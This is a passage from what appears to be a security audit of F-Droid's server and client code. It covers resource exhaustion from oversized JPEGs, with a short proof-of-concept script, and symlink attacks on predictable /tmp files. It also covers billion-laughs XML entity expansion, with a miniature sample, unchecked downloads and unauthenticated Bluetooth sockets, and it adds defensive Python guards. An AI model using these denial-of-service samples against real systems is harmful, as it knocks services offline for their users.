<div style="margin-bottom: 5pt; line-height: 6mm;">Excerpt from <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">fdroidserver/update.py:709</span>:</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">with open(inpath, 'rb') as fp:
    in_image = Image.open(fp)
    data = list(in_image.getdata())
    out_image = Image.new(in_image.mode, in_image.size)
    out_image.putdata(data)
    out_image.save(outpath, "JPEG", optimize=True)</div></pre>
<div style="margin-bottom: 5pt; line-height: 6mm;">PoC to be used with the attached lottapixels.jpg (expect your RAM to be exhausted and heavy swapping):</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">from PIL import Image

with open('lottapixel.jpg', 'rb') as fp:
    in_image = Image.open(fp)
    data = list(in_image.getdata())
    out_image = Image.new(in_image.mode, in_image.size)
    out_image.putdata(data)
    out_image.save("exploded.jpg", "JPEG", optimize=True)</div></pre>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">Moderate: Resource exhaustion on fdroid</div></div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 1.3cm; line-height: 6mm;">Check the dimensions of images before processing them, and set a ulimit and disk quota for the process.</div></div>
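<div style="margin-bottom: 5pt; line-height: 6mm;">As an added example (not part of this report or of fdroidserver), the following Python implements the "check the size before processing" recommendation for JPEG input without any image library: it walks the JPEG marker segments to the SOF header, reads the declared width and height, and refuses the file when the pixel count exceeds a budget, before a single pixel is decoded. The pixel budget, the function names and the two constructed headers (one small, one claiming 60000x60000 pixels) are the example's own assumptions; the constructed headers carry no scan data and are not viewable images.</div>

```python
import struct

# SOF0..SOF15 minus DHT (C4), JPG (C8) and DAC (CC), which share the Cx range.
SOF_MARKERS = {0xC0, 0xC1, 0xC2, 0xC3, 0xC5, 0xC6, 0xC7,
               0xC9, 0xCA, 0xCB, 0xCD, 0xCE, 0xCF}
STANDALONE = {0x01, 0xD8} | set(range(0xD0, 0xD8))  # markers without a length field
MAX_PIXELS = 50_000_000  # assumed budget; tune to what the repo actually needs


def jpeg_dimensions(data):
    """Return (width, height) declared in the JPEG's SOF segment by walking
    the header only; no pixel data is decoded and no pixel buffer allocated."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI marker")
    i = 2
    while i + 4 <= len(data):
        if data[i] != 0xFF:
            raise ValueError("expected marker at offset %d" % i)
        marker = data[i + 1]
        if marker == 0xFF:          # fill byte in front of a marker
            i += 1
            continue
        if marker in STANDALONE:
            i += 2
            continue
        if marker in (0xDA, 0xD9):  # start of scan / end of image: no SOF seen
            break
        if marker in SOF_MARKERS:
            if i + 9 > len(data):
                raise ValueError("truncated SOF segment")
            # SOF payload: length(2) precision(1) height(2) width(2) ...
            _length, _precision, height, width = struct.unpack(">HBHH", data[i + 2:i + 9])
            return width, height
        (length,) = struct.unpack(">H", data[i + 2:i + 4])
        i += 2 + length             # skip this segment (length includes its own 2 bytes)
    raise ValueError("no SOF segment found")


def check_image_budget(data, max_pixels=MAX_PIXELS):
    """Return (width, height) if the declared size fits the budget, else raise."""
    width, height = jpeg_dimensions(data)
    pixels = width * height
    if pixels > max_pixels:
        raise ValueError("image declares %dx%d = %d pixels, budget is %d"
                         % (width, height, pixels, max_pixels))
    return width, height


def is_within_budget(data, max_pixels=MAX_PIXELS):
    """Boolean form of check_image_budget(); malformed input counts as rejected."""
    try:
        check_image_budget(data, max_pixels)
        return True
    except ValueError:
        return False


def _jpeg_header(width, height):
    """Constructed test data: SOI, a JFIF APP0 segment and a baseline SOF0
    declaring the given size. No scan data follows, so this is not a picture."""
    app0 = b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    sof0 = struct.pack(">BHHB", 8, height, width, 3) + b"\x01\x22\x00\x02\x11\x01\x03\x11\x01"
    return (b"\xff\xd8"
            + b"\xff\xe0" + struct.pack(">H", len(app0) + 2) + app0
            + b"\xff\xc0" + struct.pack(">H", len(sof0) + 2) + sof0)


SAMPLE_SMALL = _jpeg_header(64, 48)          # constructed: 3,072 pixels
SAMPLE_BOMB = _jpeg_header(60000, 60000)     # constructed: 3.6 billion pixels declared

if __name__ == "__main__":
    for name, sample in (("small", SAMPLE_SMALL), ("bomb", SAMPLE_BOMB)):
        print(name, jpeg_dimensions(sample), "within budget:", is_within_budget(sample))
```

<div style="margin-bottom: 5pt; line-height: 6mm;">When Pillow is already in use, the equivalent guard is to inspect <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">in_image.size</span> right after <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">Image.open()</span>, which only reads the header, and to reject oversized files before <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">getdata()</span> materialises the pixels; Pillow's own <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">Image.MAX_IMAGE_PIXELS</span> decompression-bomb limit serves the same purpose and should be left enabled. The ulimit and disk quota remain the backstop for formats whose declared size cannot be trusted.</div>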
</div>
<a name="f17-insecure-usage-of-temporary-file-directory-in-fdroidserver-docker-drozer-py"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.14</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">OTF-014 — Insecure Usage of Temporary File/Directory in Fdroidserver Docker/drozer.py</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #FE9920;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-014</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Denial of Service</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>Moderate</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">Insecure usage of temporary files can allow an attacker to cause a Denial of Service by pointing a symlink at an important file so that it gets overwritten.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">A predictable filename is used to write in <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">/tmp</span>.</div>
<div style="margin-bottom: 5pt; line-height: 6mm;">Excerpt from docker/drozer.py:10:</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">drozer = pexpect.spawn("drozer console connect")
drozer.logfile = open("/tmp/drozer_report.log", "w")</div></pre>
<div style="margin-bottom: 5pt; line-height: 6mm;">An adversary could create a symlink and make the export script overwrite some important file, causing a denial of service.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">Moderate: difficult to trigger, but depending on the file overwritten the damage could be costly.</div></div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 1.3cm; line-height: 6mm;">Generate export files in a dedicated folder with restrictive access permissions.</div></div>
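<div style="margin-bottom: 5pt; line-height: 6mm;">As an added example (not code from this report or from the fdroidserver Docker scripts), the following Python shows the recommended shape next to the quoted pattern: the report goes into a freshly created private directory (mode 0700) under an unpredictable name, and the file is created with <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">O_CREAT|O_EXCL|O_NOFOLLOW</span>, so a pre-existing path, symlink or not, is refused rather than followed and truncated. It ends with a self-check that plants a symlink in a scratch directory and verifies the target stays intact. Function names and the <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">fdroid-export-</span> directory prefix are the example's own.</div>

```python
import os
import stat
import tempfile


def open_report_insecure(path="/tmp/drozer_report.log"):
    """The pattern quoted from docker/drozer.py: a fixed, predictable name in a
    shared directory, opened with truncation and following symlinks."""
    return open(path, "w")


def open_excl_nofollow(path):
    """Create `path` for writing only if nothing exists there yet. O_EXCL makes
    the open fail on any existing path (a planted symlink included) and
    O_NOFOLLOW, where the platform has it, refuses to traverse a final symlink."""
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(path, flags, 0o600)
    return os.fdopen(fd, "w")


def create_report_file(prefix="drozer_report_"):
    """Recommended shape: a private directory per run (mkdtemp creates it with
    mode 0700) and an unpredictable file name inside it (mkstemp uses O_EXCL
    and mode 0600). Returns (file object, path)."""
    report_dir = tempfile.mkdtemp(prefix="fdroid-export-")
    fd, path = tempfile.mkstemp(prefix=prefix, suffix=".log", dir=report_dir)
    return os.fdopen(fd, "w"), path


def report_file_permissions(path):
    """(directory mode, file mode) as permission bits, for verifying the result."""
    return (stat.S_IMODE(os.stat(os.path.dirname(path)).st_mode),
            stat.S_IMODE(os.stat(path).st_mode))


def remove_report(path):
    """Remove the report file and its private directory."""
    os.remove(path)
    os.rmdir(os.path.dirname(path))


def symlink_is_refused():
    """Self-check in a scratch directory: plant a symlink where the log would be
    written and confirm open_excl_nofollow() refuses it while a fresh name
    succeeds and the symlink target is left untouched."""
    with tempfile.TemporaryDirectory() as scratch:
        victim = os.path.join(scratch, "victim")
        with open(victim, "w") as fh:
            fh.write("do not clobber\n")
        planted = os.path.join(scratch, "drozer_report.log")
        os.symlink(victim, planted)
        try:
            open_excl_nofollow(planted).close()
            refused = False
        except OSError:              # EEXIST (or ELOOP) depending on the platform
            refused = True
        with open_excl_nofollow(os.path.join(scratch, "fresh.log")) as fh:
            fh.write("ok\n")
        with open(victim) as fh:
            intact = fh.read() == "do not clobber\n"
    return refused and intact


if __name__ == "__main__":
    fh, path = create_report_file()
    fh.write("report body\n")
    fh.close()
    print(path, "modes:", [oct(m) for m in report_file_permissions(path)])
    remove_report(path)
    print("planted symlink refused and target intact:", symlink_is_refused())
```

<div style="margin-bottom: 5pt; line-height: 6mm;">The private directory is what removes the race entirely: nobody else can create entries in a 0700 directory owned by the exporting user, so the O_EXCL check inside it cannot be pre-empted. O_EXCL and O_NOFOLLOW on their own still help when the file must live in a shared directory, because the worst outcome becomes a refused open rather than an overwritten file.</div>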
</div>
<a name="f20-parsing-untrusted-xml-data-in-fdroidserver"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.15</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">OTF-015 — Parsing Untrusted XML Data in Fdroidserver</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #FE9920;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-015</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Denial of Service</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>Moderate</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">XML parsing can be used to exhaust resources (RAM) when entity expansion is abused, as in the Billion Laughs and Quadratic Blowup attacks. In fdroidserver there are a couple of places where this can happen.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">Fdroidserver uses the python modules <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">xml.dom.minidom</span>, <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">xml.etree.ElementTree</span> and <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">lxml</span>. All of these are vulnerable to both "quadratic blowup" and "billion laughs" attacks.</div>
<div style="margin-bottom: 5pt; line-height: 6mm;">See also: <a href="https://docs.python.org/3/library/xml.html#xml-vulnerabilities" style="color: #e2632a;">https://docs.python.org/3/library/xml.html#xml-vulnerabilities</a></div>
<div style="margin-bottom: 5pt; line-height: 6mm;">Affected files:</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">Location: ./fdroidserver/btlog.py:97
doc = xml.dom.minidom.parse(repof)</div></pre>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">Location: ./fdroidserver/common.py:2940
return XMLElementTree.parse(path).getroot()</div></pre>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">Location: ./fdroidserver/server.py:453
tree = fromstring(response)</div></pre>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">Moderate: Availability can be restricted due to Denial of Service attacks</div></div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 1.3cm; line-height: 6mm;">Replace these calls with their defusedxml equivalents or, for the xml.* modules only, make sure defusedxml.defuse_stdlib() is called before parsing.</div></div>
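<div style="margin-bottom: 5pt; line-height: 6mm;">As an added example (not part of this report or of fdroidserver, and not the defusedxml code itself), the following Python shows the mechanism the recommendation relies on, using only the standard library: expat reports entity and DOCTYPE declarations through handlers while it is still reading the DTD, before anything is expanded, so a handler that raises stops the parse before memory is consumed. defusedxml installs these same handlers inside the parser; here they run as a pre-check in front of the unchanged <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">ElementTree.fromstring()</span>, which is a drop-in for the <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">fromstring(response)</span> and <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">parse(path).getroot()</span> calls listed above. The sample documents and function names are constructed for the example; the entity sample is a two-level miniature of the pattern named in the linked Python documentation, far too small to cause harm.</div>

```python
import xml.parsers.expat
from xml.etree import ElementTree as ET


class EntitiesForbidden(ValueError):
    """Raised when a document carries a DTD or entity declaration, the
    ingredient of both the billion-laughs and the quadratic-blowup attacks."""


def reject_entity_declarations(data):
    """Run expat over `data` with declaration handlers that abort. The handlers
    fire while the DTD is being read, i.e. before any entity reference in the
    body is expanded, so the abort precedes the memory blow-up. Returns `data`
    unchanged when it is clean."""
    parser = xml.parsers.expat.ParserCreate()

    def forbid_entity(name, *_args):
        raise EntitiesForbidden("entity declaration %r not allowed" % name)

    def forbid_doctype(doctype_name, *_args):
        raise EntitiesForbidden("DOCTYPE %r not allowed" % doctype_name)

    parser.StartDoctypeDeclHandler = forbid_doctype       # no DTD at all ...
    parser.EntityDeclHandler = forbid_entity              # ... and, belt and braces,
    parser.UnparsedEntityDeclHandler = forbid_entity      # no entity declarations
    parser.Parse(data, True)
    return data


def safe_fromstring(data):
    """Drop-in for ElementTree.fromstring(): check first, then parse as before."""
    return ET.fromstring(reject_entity_declarations(data))


def safe_parse_file(path):
    """Drop-in for ElementTree.parse(path).getroot() on an untrusted file."""
    with open(path, "rb") as fh:
        return safe_fromstring(fh.read())


def is_rejected(data):
    """True if the guard refuses the document, False if it parses."""
    try:
        safe_fromstring(data)
        return False
    except EntitiesForbidden:
        return True


# Constructed samples. Predefined entities such as &amp; are not declarations
# and keep working; a DOCTYPE with nested entity declarations is refused.
BENIGN = b'<manifest package="org.example.app"><application label="A &amp; B"/></manifest>'
TINY_LAUGHS = (b'<?xml version="1.0"?>'
               b'<!DOCTYPE lolz [<!ENTITY lol "lol">'
               b'<!ENTITY lol2 "&lol;&lol;&lol;&lol;">'
               b'<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;">]>'
               b'<lolz>&lol3;</lolz>')

if __name__ == "__main__":
    root = safe_fromstring(BENIGN)
    print("benign parsed:", root.tag, root.get("package"), root[0].get("label"))
    print("entity sample rejected:", is_rejected(TINY_LAUGHS))
```

<div style="margin-bottom: 5pt; line-height: 6mm;">The same pre-check works in front of <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">xml.dom.minidom.parseString()</span> for the btlog.py case; for lxml the guard has to be applied to the bytes before they reach the parser, since defusedxml's defuse_stdlib() only patches the xml.* modules, as the recommendation notes. Forbidding the DOCTYPE outright is appropriate here because none of the inputs (Android manifests, repository index files, Nexus responses) legitimately needs a DTD.</div>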
</div>
<a name="f30-downloader-download-file-type-and-size-are-not-verified"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.16</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">OTF-016 — Missing file type and size validation </div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #FE9920;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-016</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Arbitrary file download</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>Moderate</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">Download File Type and Size Are Not Verified</div></div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">Affected files are <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">net/BluetoothDownloader.java</span>, the other derived classes <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">localFileDownloader.java</span>, <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">httpDownLoader.java</span> and <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">imageDownLoader.Java</span>, and their superclass <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">Downloader.java</span>.</div>
<div style="margin-bottom: 5pt; line-height: 6mm;">The download activity using the WiFi or Bluetooth downloader classes does not check the type or the size of the file. This functionality is intended for APK sharing between trusted devices.</div>
<div style="margin-bottom: 5pt; line-height: 6mm;"><span style="font-weight: bold;">Developer comments:</span> The install process requires that the hash of the received file matches that in the signed <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">index.jar</span>. So for the exploit to install a malicious APK, the index.jar must also be compromised. The fdroid install process first validates the sha256 against what is in the signed <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">index.jar</span>, so after the download process all files are verified. The download process puts the files into a private dir, so the user cannot install them manually after download, only via <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">fdroidclient</span>.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">An arbitrary, potentially malicious, file can be downloaded onto an unsuspecting user's device. This may allow an attacker to activate a different exploit vector.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">Only allow certain types of files to be transmitted (whitelisting) where possible.</div>
<div style="margin-bottom: 5pt; line-height: 6mm;">Limit the size of the files to be transmitted, and warn the user about large files.</div>
<div style="margin-bottom: 1.3cm; line-height: 6mm;">The issue should be fixed in the parent class, and the subclasses should perform a content type check of their own, to avoid malicious file/app installation on the victim device.</div>
</div>
</div>
<a name="f31-bluetoothclient-java-insecure-rfcomm-socket-is-used-for-bluetooth-connection"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.17</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">OTF-017 — Use of Insecure Communication Mechanism - BluetoothClient.java</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #FE9920;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-017</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Insecure communication</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>Moderate</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">Insecure RFComm Socket Is Used for Bluetooth Connection - BluetoothClient.java</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">In file net/bluetooth/BluetoothClient.java the Bluetooth client creates an insecure RFComm socket. This type of connection is vulnerable to MitM attacks, as the link is neither authenticated nor encrypted.</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">Line 29: socket = device.createInsecureRfcommSocketToServiceRecord(BluetoothConstants.fdroidUuid());</div></pre>
<div style="margin-bottom: 5pt; line-height: 6mm;">Reference: <a href="https://developer.android.com/reference/android/bluetooth/BluetoothDevice.html#createInsecureRfcommSocketToServiceRecord(java.util.UUID)" style="color: #e2632a;">https://developer.android.com/reference/android/bluetooth/BluetoothDevice.html#createInsecureRfcommSocketToServiceRecord(java.util.UUID)</a></div>
<div style="margin-bottom: 5pt; line-height: 6mm;"><span style="font-weight: bold;">Developer response:</span> Ideally, F-Droid would always use encrypted connections, but with the p2p we have found that it made it a lot harder to make the exchange. We rely on a TOFUed signing key on the <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">index.jar</span> to provide the integrity check. We went with unencrypted HTTP and Bluetooth to increase the likelihood that things would work.</div>
<div style="margin-bottom: 5pt; line-height: 6mm;"><span style="font-weight: bold;">ROS response:</span> Sharing a password protected file over insecure RFComm socket, containing a symmetric encryption key, can be used to exchange keys between untrusted devices. </div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">Integrity of communication is compromised, leading to arbitrary app installation and device compromise.
</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 1.3cm; line-height: 6mm;">An out-of-band key-sharing mechanism, such as a password-protected file containing a symmetric encryption key that is shared over the insecure RFComm socket, can be used to exchange keys between untrusted devices instead of relying on TOFU.</div>
</div>
</div>
<a name="f32-bluetoothserver-java-insecure-rfcomm-socket-used-for-bluetooth-connection"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.18</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">OTF-018 — Use of Insecure Communication Mechanism - BluetoothServer.java</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #FE9920;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-018</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Insecure communication</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>Moderate</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">Insecure RFComm Socket Is Used for Bluetooth Connection - BluetoothServer.java</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">In file net/bluetooth/BluetoothServer.java the Bluetooth server creates an insecure RFComm socket. This type of connection is vulnerable to MitM attacks, as the link is neither authenticated nor encrypted.</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">Line 72:
serverSocket =
        adapter.listenUsingInsecureRfcommWithServiceRecord("FDroid App Swap",
                BluetoothConstants.fdroidUuid());</div></pre>
